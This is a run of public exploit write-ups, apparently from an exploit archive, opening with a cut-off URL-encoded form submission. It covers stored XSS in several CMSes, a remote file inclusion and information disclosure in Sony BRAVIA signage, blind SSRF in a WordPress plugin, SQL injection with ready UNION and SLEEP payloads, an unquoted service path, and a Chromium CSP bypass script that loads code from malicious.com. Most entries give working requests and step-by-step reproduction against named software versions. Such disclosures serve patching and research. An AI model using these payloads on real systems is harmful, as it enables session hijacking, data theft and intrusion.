YVBLlnKXatlNf3x91urPZhemx35uzEied9Tk7w8W3o5W5W5a9vWLrBkEg4Mhm5IHx0qTn9LHLP5dNi6EQnM%2B%2FE1%2FRcJoZq1%2BkjhBOPGx1M7EVg%2BnXzJLy1%2BnXEf5D64P6pS8HdNtxQOtLgP4RC9YFWzkMhRI%2B9B71cPQfRHKAJCB3idIBtvQ7OhmArPbsq0pOvmfOF7c3dsy0NyY8KtVTlGaL1km5H1Q2SZdn1yMmnaeGlOgoioPM7fSZ8u%2BE%2BtQkvuPY5afsnt1H%2BUmGBGbiZZZR1%2BR%2FkvUANhzOHnLfuXcloItlRnvpKF0gIW&__VIEWSTATE3=VG3JlCj%2FguoAhsgsZxvtFo51ac%2FZob3zGU3iuvj56w2XljOxYhJ25EqC%2BaJjbgyCCSgF%2FIUQ8XIdHtIOBKvDhyv%2BWhlPdttXTOzBKk9EW6swSmZN9TNVL32jDq5suMPMrh9SsNj7b62O0ycjpCeVPRGfCThjWYxu0GwFiy%2Fnd65fr6BUCiaoTliKw%2Bvnh3IMw0CQSu5VdL0Y4h2R5hiomNKkcfqjFN%2BXtj9UrXNqOS13QZ9TP1NLf0Q2CXQ%2FjZvwSM9koJlEZ3Z2xfvOo4VXU92ONV%2FuBg3ugFTpw9NcEVnU5C5HDDQdQJpYqrUpRpIOaDru80pqBz90shkebGCRnbbeSAaZb%2FpcBsSNnmpftBSftR0nZYMX3VAAJaxjyehbtfLsmbHPuCdzyLOsqMPaFClG00yAR%2BbmuKIv2veSZ6GBGQjM14jrRoWgqZmF711tfCIfEDYErBz5%2BGC%2F4xz8gv44z%2BSF8VKk4s5dOCKZo1YZQ7yFqSYD&__VIEWSTATE4=z%2FvLRzX2nqqUfDd9UEeZG%2Bowmey7SmdvonndNsjZWX35cB4FiARHvWJhnHIoJEY2%2BJB6bFM8628%2B35cnidhq5iboc6dhqAo%2Fl9VbFfp4rxq%2BGh%2Bw%2Fu%2BNiyai3o6LWuy5cWxRnAMrlNhErHm86uVj1HTosQbBDhd0PU7yVTS2dEtfi3GggBfVDFn2eLh4sr6iSkN85RPhENouvNKl6PmHhhaFl4poe6etmjh63vYipPoY1VvYz2h%2BDisT5lEo7NYOhchYv%2FIQPuGkPBjkdTqtqourBuYw0pzLGRA1zf8X0UgwWnJVT8RLaf3Bp0uatXoatA%2FIo5j1Lggxm9cM2GFH7%2FrYDwAyPgWF%2BtLgqQUpnZoQoeIh62uPykr3p5pKsWXpKdtz4IINfyH%2BE0CH2gj96zVM76zFHdYt59%2Bs%2BZgu5i%2Bzf3icKJWlZaJiLzfEpSwIQijjvzC5CxwEAoO1LfnupW%2FZFWt%2FwsDXOZl2tgAunHfXe4sv4YHu&__VIEWSTATE5=8E0NZMBOC6vc%2Fm%2F%2FPv1X3U9D8PHM%2F60zTW2Fgz%2FDdau3xuxrxCd6EkTpHliKnJld0hjuEnMan6KZGs3sy59qTLc%2FOAU5Y%2Bg4FtWPugB%2B8faI4wtWGpLlR%2F2%2FhVyIer702HqYaZe2YtmG3FzYsEP5iNdWBIVAHG%2B285uMPcrARf7t7RNbnVLYe2hR4g6rm%2B3cz7Xlvl0hW1gtdYBLtD4x8eGpNWXsrZEdc9jjsRgDfd12VsDVZeIYxA5llNAQYyLLcv1czlYtLC2rT2cay3LZ3bCz5KvNOiNQNc4PjL5bXBFGlz9BCztmCHaxWXkhytsFQJOND2HqK6ZcBSsXFur9XKjdhkVbLJUGY6hd9zlqurehbzaS9qJFe2g1DTCuJeN39qqcjJk3ev3TOQbu9Q2RX2VEFF8Mdd8WFRdaJ7JJN5kzkmVgtcjmrhHZjpsZEGVYmL0A3HbXukjVBb8kHoOA1MzUagoa6kwmCNfNCmGgbKKZVSm90HF5&__VIEWSTATE6=O%2BS12LR2Z4oVhKLtpr07dZf4n4xaCnf%2BvWZpBROiixTdpBGO4Eg3J%2B2UqaWIrBm2FJjY%2B2NAG6EiGHDpYEzCuBEHQQg3RzT0co%2F0MXY0Vp%2FvhG5voMgkx24Zixl3Z2RcJ7GFNDyF2hDwZmEhmR8d5Xeh%2FlkLsGc4vHL7SAXLwg5lSPgLb8wTEPDv2WkOChlXK%2BKAUm5v6N4o3dv9j9fztlHsS%2FFXHM1HvYfH%2BX5UPFAfvCkiiK6iXbrQsvVRVX9KBvWmMdBLC4FHSX8BO6qy2U8d2TaJIG2YfewgUHkGWMEvhqFqsTyetatA&__VIEWSTATEGENERATOR=28F0A2BA&__EVENTVALIDATION=MhCP0%2FosgOAGG9hof6m2uvCclDI3J3ur9418exWCyHZn20PSWqlYEBB584LM%2Fwt7LEIk5phX%2F%2FnqL9ZAiCGAwuqvm%2FS9%2FjvzaXlbQf9H0qlhD30h7hKVA1zy%2FQB1rQh8Nbmh3tjczNLrHj%2BY%2FlybGM%2BEyN%2BelhoN8Q%2FOykCziCKgbY9tDeDf4S%2FWsjzOoEGyOpijMEyEq0ikBrY26gO4X0GeiV6Yw6LvTHt5PL%2FNElgUT%2BCw%2B0loxrz5QgIKuKqozFkU08iSXgsVrNJKUFD%2FJaUPeaDRiNUjYsMQq5qXop%2F1%2B3lUT1XDP1MelFUveIeo4AxsnA%2FhoiB48O69ScQY0J6WTvQo%2B%2FpY6Cn4Din2x5QvSigzwCJtqI3F%2BSWxlZzYSeJCq1uQlw2lboNaJhOoDSDTUG3cO3Oy18WG6PHcKbZHgq%2BPDJq6RvXq50a9Z36J4lnFpQmRofOaSpXR7e0uoBo6VYatMOcu3uWC6WKq6%2F8I0G88OKDIXdU8mQyTr%2B4IfZ2tAwNkfhQQyOOPOQKjJOPGOYnH14ozP58d7PNrMbUQKCwyimsUbox5uLQclzM5wK4x1mV9FqA9PZOy1Q9ApKyLotkAJbTdVmBkDQ1ZKOUd9GOBgg%2BAOuVokVGF8qCF4NYZjBZjpfW0OmihSu%2BXiONqPoa6K5483r8tF0%2F5Hch2K4XggkPqA%2B%2FVmfHr%2BkwKb7RUbQ%3D%3D&ctl00%24mainContent%24txtTitle=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ctl00%24mainContent%24edContentinnerEditor=&ctl00%24mainContent%24txtSortOrder=100&ctl00%24mainContent%24txtPostsPerPage=10&ctl00%24mainContent%24txtThreadsPerPage=40&ctl00%24mainContent%24allowedPostRoles%24ctl00%242=Authenticated+Users&ctl00%24mainContent%24txtModeratorNotifyEmail=&ctl00%24mainContent%24chkIncludeInGoogleMap=on&ctl00%24mainContent%24btnUpdate=Create+New+Forum&ctl00%24mainContent%24hdnReturnUrl=https%3A%2F%2Flocalhost%2Fforums '''

# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion # Date: 20.09.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://pro-bravia.sony.net # Version: 1.7.8 Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion Vendor: Sony Electronics Inc. Product web page: https://pro-bravia.sony.net https://pro-bravia.sony.net/resources/software/bravia-signage/ https://pro.sony/ue_US/products/display-software Affected version: <=1.7.8 Summary: Sony's BRAVIA Signage is an application to deliver video and still images to Pro BRAVIAs and manage the information via a network. Features include management of displays, power schedule management, content playlists, scheduled delivery management, content interrupt, and more. This cost-effective digital signage management solution is ideal for presenting attractive, informative visual content in retail spaces and hotel reception areas, visitor attractions, educational and corporate environments. Desc: BRAVIA digital signage is vulnerable to a remote file inclusion (RFI) vulnerability by including arbitrary client-side dynamic scripts (JavaScript, VBScript, HTML) when adding content though the input URL material of type html. This allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display. Tested on: Microsoft Windows Server 2012 R2 Ubuntu NodeJS Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5612 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php 20.09.2020 -- Request: -------- POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1 Host: 192.168.1.20:8080 Proxy-Connection: keep-alive Content-Length: 468 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.1.20:8080 Referer: http://192.168.1.20:8080/test.txt Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: io=RslVZVH6Dc8WsOn5AAAJ {"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}

# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure # Date: 20.09.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://pro-bravia.sony.net # Version: 1.7.8 Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure Vendor: Sony Electronics Inc. Product web page: https://pro-bravia.sony.net https://pro-bravia.sony.net/resources/software/bravia-signage/ https://pro.sony/ue_US/products/display-software Affected version: <=1.7.8 Summary: Sony's BRAVIA Signage is an application to deliver video and still images to Pro BRAVIAs and manage the information via a network. Features include management of displays, power schedule management, content playlists, scheduled delivery management, content interrupt, and more. This cost-effective digital signage management solution is ideal for presenting attractive, informative visual content in retail spaces and hotel reception areas, visitor attractions, educational and corporate environments. Desc: The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information running on the device. Tested on: Microsoft Windows Server 2012 R2 Ubuntu NodeJS Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5610 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php 20.09.2020 -- $ curl http://192.168.1.20:8080/api/system {"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}

# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting # Date: 02-12-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://invisioncommunity.com/ # Software Link: https://invisioncommunity.com/buy # Version: 4.5.4 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29477 Vulnerable Parameters: Profile - Field Name. Steps-To-Reproduce: 1. Go to the Invision Community admin page. 2. Now go to the Members - MEMBER SETTINGS - Profiles. 3. Now click on Add Profile field. 4. Put the below payload in Field Name: "<script>alert(123)</script>" 5. Now click on Save button. 6. The XSS will be triggered. POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 660 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: XYZ form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=

# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) # Date: 03/12/2020 # Exploit Author: Pankaj Verma (_p4nk4j) # Vendor Homepage: https://www.canto.com/integrations/wordpress/ # Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin # Version: 1.3.0 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978 Description:- The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities. It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter. Vulnerable Parameters and Endpoints:- https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain= https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain= https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain= Steps To Reproduce:- 1. Start a Netcat Listener on any port For e.g. 4499 2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain=" 3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter. 4. Observe the response we got from the Target on Attacker's Listener. Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.

# Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting # Date: 3-12-2020 # Exploit Author: Parshwa Bhavsar # Vendor Homepage: https://compo.sr/ # Software Link: https://compo.sr/download.htm # Version: 10.0.34 # Tested on: Windows 10/ Kali Linux Steps To Reproduce :- 1. Install the CMS from the download link & configure it. 2. After configuration login with admin Credential . 3. You will notice “Add banner” in the top of the browser. 4. Click on it and Put XSS payload (any) in “Description” field. 5. Save it & Click on Home. 6. Every time any user visit the website , the XSS payload will trigger.

# Exploit Title: IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path # Discovery by: Diego Cañada # Software link: https://www.pconlife.com/download/otherfile/20566/90674cffc8658c4f2bf58d43bb9b7ccb/ # Discovery Date: 2020-12-03 # Tested Version: 1.0.6499.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home Single Language x64 ES # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """ Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto # Service info: C:\>sc qc StacSV [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: StacSV TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe GRUPO_ORDEN_CARGA : AudioGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Audio Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection # Date: 2020-12-04 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://github.com/geraked/phpscript-sgh # Software Link: https://github.com/geraked/phpscript-sgh # Version: 0.1.0 # Tested on: Kali Linux ------------------------------------------------------------------------------------------------------------------------ Source code(localhost/admin/admins.php): if ($_REQUEST['op']=='add') { $id = $username = $password = $conf_password = $firstname = $lastname = $email = $pic = $_SESSION['aapic'] = ""; } else { $result = $conn->query("SELECT * FROM sgh_admins WHERE id=".test_input($_REQUEST['id'])." LIMIT 1"); $row = $result->fetch_assoc(); extract($row); $_SESSION['aapic'] = $pic; } ------------------------------------------------------------------------------------------------------------------------ Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: op=edit&id=1 AND (SELECT 9367 FROM (SELECT(SLEEP(5)))pBEE)&_pjax=#pjax-container Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: op=edit&id=-5015 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x536b4e4a775448674c73477175675a4c58476659474f524b535456706e7276474251424a4f67744b,0x717a626b71),NULL-- -&_pjax=#pjax-container ------------------------------------------------------------------------------------------------------------------------

# Exploit Title: MiniCMS 1.10 - 'content box' Stored XSS # Date: 2019-7-4 # Exploit Author: yudp # Vendor Homepage: https://github.com/bg5sbk/MiniCMS # Software Link:https://github.com/bg5sbk/MiniCMS # Version: 1.10 # CVE :CVE-2019-13339 Payload：<script>alert("3: "+document.domain)</script> In /MiniCMS/mc-admin/page-edit.php POC: 1. Go to the page-edit page and input the payload into the content box ,click save button 2.Use burpsuite to edit the payload. Pay attention that the “+” needs to be url-encoded 3.After that, go to the page we have saved 4.Window will pop with the domain

# Exploit Title: Testa Online Test Management System 3.4.7 - 'q' SQL Injection # Date: 2020-07-21 # Google Dork: N/A # Exploit Author: Ultra Security Team # Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar # Vendor Homepage: https://testa.cc # Version: v3.4.7 # Tested on: Windows/Linux # CVE: N/A .:: Description ::. Testa Helps You To make Online Exams. .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target Using Testa - Online Test Management System. Step 2 - Click on List And Search Exams. Step 3 - Inject Your Payloads in Search Field. .:: Sample Request ::. POST / HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: localhost Cookie: PHPSESSID=7eg4b3fl6vm8a11kmkh4pkq290; testa_user2=1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 8 p=1&q=-1' UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 #

#Title: Chromium 83 - Full CSP Bypass #Date: 02/09/2020 #Exploit Author: Gal Weizman #Vendor Homepage: https://www.chromium.org/ #Software Link: https://download-chromium.appspot.com/ #Version: 83 #Tested On: Mac OS, Windows, iPhone, Android #CVE: CVE-2020-6519 (function(){ var payload = ` top.SUCCESS = true; var o = document.createElement("object"); o.data = \`http://malicious.com/bypass-object-src.html\`; document.body.appendChild(o); var i = document.createElement("iframe"); i.src = \`http://malicious.com/bypass-child-src.html\`; document.body.appendChild(i); var s = document.createElement("script"); s.src = \`http://malicious.com/bypass-script-src.js\`; document.body.appendChild(s); `; document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>"; setTimeout(() => { if (!top.SUCCESS) { XXX.contentWindow.eval(payload); } }); }()) // further information: https://github.com/weizman/CVE-2020-6519

# Exploit Title: Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting # Date: 2020-09-02 # Exploit Author: Dhruv Patel(dhruvp111296) # Vendor Homepage: https://savsoftquiz.com/ # Software Link: https://github.com/savsofts/savsoftquiz_v5.git # Version: 5.0 # Tested on: Windows 10 Attack vector: This vulnerability can results attacker to inject the XSS payload in admin panel Custom Field section. And Inject JavaScript Malicious code & Steal User’s cookie Vulnerable Parameters: title Steps for reproduce: 1. Go to admin panel’s add custom fields page 2. Fill the Title name as <script>alert("HELLO XSS")</script> payload in title. 3. Now Click on Save we can see our payload gets executed. 4. All Users Can Show our Payload As a xss.